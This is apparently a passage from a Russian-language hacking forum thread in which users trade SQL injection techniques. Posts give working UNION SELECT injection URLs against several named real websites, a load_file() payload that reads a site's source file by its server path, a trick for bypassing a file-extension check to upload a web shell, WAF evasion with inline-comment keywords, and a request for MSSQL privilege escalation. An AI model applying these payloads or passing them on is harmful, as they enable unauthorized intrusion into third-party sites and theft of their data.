чтоб проверить на включение file_priv, можно воспользоваться функцией локального чтения файлов, load_file(), или если доступна БД mysql.user, то в ней можно просмотреть на учетную запись сайта file_priv
Пропустили php4. Если на сервере установлены дополнительные яп/в application/x-httpd-php прописано нестандартное расширение - можно воспользоваться этим. Мы можем пройти эту проверку: PHP: if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) SendResults( '202' ) ; Если напишем в переменную $_GET['Type'] то, что не предусматривает разработчик(Например '!!!'). И соответственно зальём шелл.
а можешь показать как ето делать на примере, например тут http://www.miroboew-kazan.ru/news.php?id=3%27+union+select+1,2,3,4%20,5,6,7--
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,(select+load_file('/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/news.php')),3,4,5,6,7--+ Только у тя прав нету файловых И вообще, по теме залива шелла через мускульную инъекцию дохрена написано. Не проще почитать всё разом, чтобы усвоить всё сразу? Тебе ж выше в куче постов всё подробно разжевали что и как.
Подними у ся вебсервер, сделай какой-нить простой скрипт с выборкой из базы и принимаемым параметром от юзвера. И собсна потесть. В основном при установке ты будешь под рутом, у которого есть file_priv - там и увидишь что и как.
Если прав нету, то ничего не выводится. Если есть - содержимое файла ;-( зы. разве в пхп можно через echo выводить массив? Но тут может я ошибаюсь...
У себя сервер, где ты будешь под рутом, а не на хостинге. Так же убедись, что путь с файлом существует.
У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876 С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.
Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию). Все бы хорошо, но: Как можно повысить себе права? Можте кто-то уже делал запрос? Читал мануалы по мсскл, но не вкурил =(
http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц) Code: http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+
ты чё КЭП?? смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+